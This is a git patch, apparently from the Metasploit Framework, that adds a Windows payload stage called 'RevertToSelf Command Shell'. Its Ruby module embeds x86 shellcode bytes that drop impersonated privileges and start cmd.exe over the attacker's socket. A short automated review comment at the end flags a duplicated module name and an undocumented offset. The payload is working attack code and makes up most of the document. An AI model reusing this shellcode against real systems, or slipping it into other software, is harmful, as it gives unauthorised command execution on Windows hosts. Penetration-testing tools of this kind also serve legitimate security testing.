From 4934bd770902cee7bf7263a1a2745a2d25138e12 Mon Sep 17 00:00:00 2001
From: Matt Miller
Date: Sat, 7 Jan 2006 19:25:18 +0000
Subject: [PATCH] rename pipe shell to shell and shell to shell_revert

git-svn-id: file:///home/svn/incoming/trunk@3325 4d416f70-5f16-0410-b530-b9f4589650da
---
.../payloads/stages/windows/shell_revert.rb | 49 +++++++++++++++++++
1 file changed, 49 insertions(+)
create mode 100644 modules/payloads/stages/windows/shell_revert.rb

diff --git a/modules/payloads/stages/windows/shell_revert.rb b/modules/payloads/stages/windows/shell_revert.rb
new file mode 100644
index 0000000000..28efffe729
--- /dev/null
+++ b/modules/payloads/stages/windows/shell_revert.rb
@@ -0,0 +1,49 @@
+require 'msf/core'
+
+module Msf
+module Payloads
+module Stages
+module Windows
+
+module Shell
+
+ include Msf::Payload::Windows
+
+ def initialize(info = {})
+ super(merge_info(info,
+ 'Name' => 'Windows RevertToSelf Command Shell',
+ 'Version' => '$Revision$',
+ 'Description' => 'Call RevertToSelf and spawn a command shell',
+ 'Author' => 'hdm',
+ 'Platform' => 'win',
+ 'Arch' => ARCH_X86,
+ 'Session' => Msf::Sessions::CommandShell,
+ 'PayloadCompat' =>
+ {
+ 'Convention' => 'sockedi',
+ 'SymbolLookup' => 'ebp',
+ },
+ 'Stage' =>
+ {
+ 'Offsets' =>
+ {
+ 'EXITFUNC' => [ 103 + 28, 'V' ]
+ },
+ 'Payload' =>
+ "\xe8\x09\x00\x00\x00\x41\x44\x56\x41\x50\x49\x33\x32\x00\xff\x55" +
+ "\x08\x50\x68\x2a\xc8\xde\x50\xff\x55\x04\xff\xd0" +
+ "\x68\x43\x4d\x44\x00\x89\xe3\x87\xfa\x31\xc0\x8d\x7c\x24\xac\x6a" +
+ "\x15\x59\xf3\xab\x87\xfa\x83\xec\x54\xc6\x44\x24\x10\x44\x66\xc7" +
+ "\x44\x24\x3c\x01\x01\x89\x7c\x24\x48\x89\x7c\x24\x4c\x89\x7c\x24" +
+ "\x50\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51\x49\x51\x51\x53" +
+ "\x51\xff\x75\x00\x68\x72\xfe\xb3\x16\xff\x55\x04\xff\xd0\x89\xe6" +
+ "\xff\x75\x00\x68\xad\xd9\x05\xce\xff\x55\x04\x89\xc3\x6a\xff\xff" +
+ "\x36\xff\xd3\xff\x75\x00\x68\x7e\xd8\xe2\x73\xff\x55\x04\x31\xdb" +
+ "\x53\xff\xd0"
+ }
+ ))
+ end
+
+end
+
+end end end end
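Review bot: The new `shell_revert.rb` still declares `module Shell`, so it defines the constant `Msf::Payloads::Stages::Windows::Shell`, which the commit subject suggests the renamed `shell.rb` also uses (that file is not visible in this patch). If both files are loaded into one process, the second would reopen the same module and replace `initialize`, unless the loader isolates modules by file path. Renaming the constant to match the file, `module ShellRevert`, keeps the two stages distinct. Separately, `'EXITFUNC' => [ 103 + 28, 'V' ]` and the byte string carry no comment naming the assembly source or how the offset was derived, so a reviewer cannot confirm the offset still matches the blob. A comment such as `# EXITFUNC offset within the stage; assembled from <asm source path>` above the `'Offsets'` entry would make that auditable.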